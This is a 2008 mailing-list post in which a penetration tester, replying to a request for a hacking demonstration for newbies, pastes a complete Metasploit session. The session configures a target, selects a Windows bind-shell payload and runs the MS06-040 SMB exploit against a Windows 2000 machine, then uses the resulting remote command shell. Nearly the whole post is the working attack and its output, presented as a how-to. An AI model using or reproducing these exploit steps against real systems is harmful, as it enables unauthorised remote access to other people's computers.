28May2008 (UTC +8)
> > On Wednesday 28 May 2008 2:01:34 pm Louie Miranda wrote:
> > > Demonstration on how to hack a Linux system for newbies -- common remote
> > > root exploit or local root exploit.
You mean like this? :) I don't consider posting this info here as
risky because it's almost common knowledge, and it's an old trick...
Of course, the new or custom 'sploits are confidential.
===============================================================
[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ echo ""; uname -a; echo ""; date; echo ""
Linux ATTACKSTATION 2.6.24.4-64.fc8 #1 SMP Sat Mar 29 09:15:49 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
Wed Apr 30 23:48:50 PHT 2008
[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ free
             total       used       free     shared    buffers     cached
Mem:       4061864    4037568      24296          0    2953512     113784
-/+ buffers/cache:     970272    3091592
Swap:      4000176         64    4000112
[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ ./msfconsole
=[ msf v3.2-release
+ -- --=[ 284 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 54 aux
msf > setg RHOST 10.20.10.176
RHOST => 10.20.10.176
msf > setg TARGET 0
TARGET => 0
msf > setg PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf >
msf > use windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL PROTECTED]:10.20.10.176[\BROWSER]
...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL PROTECTED]:10.20.10.176[\BROWSER]
...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (10.80.56.225:57035 -> 10.20.10.176:4444)
msf exploit(ms06_040_netapi) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>hostname
hostname
win2000
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.20.10.176
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.20.0.1
C:\WINNT\system32>
C:\WINNT\system32> exit
[*] Command shell session 1 closed.
msf exploit(ms06_040_netapi) >
msf exploit(ms06_040_netapi) > back
msf >
msf > exit
[EMAIL PROTECTED] msf]$
====================================================
Drexx Laggui -- CISA, CISSP, CFE Associate, ISO27001 LA, CCSI, CSA
http://www.laggui.com ( Singapore / Manila / California )
Computer forensics; Penetration testing; QMS & ISMS developers; K-Transfer
PGP fingerprint = 6E62 A089 E3EA 1B93 BFB4 8363 FFEC 3976 FF31 8A4E
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List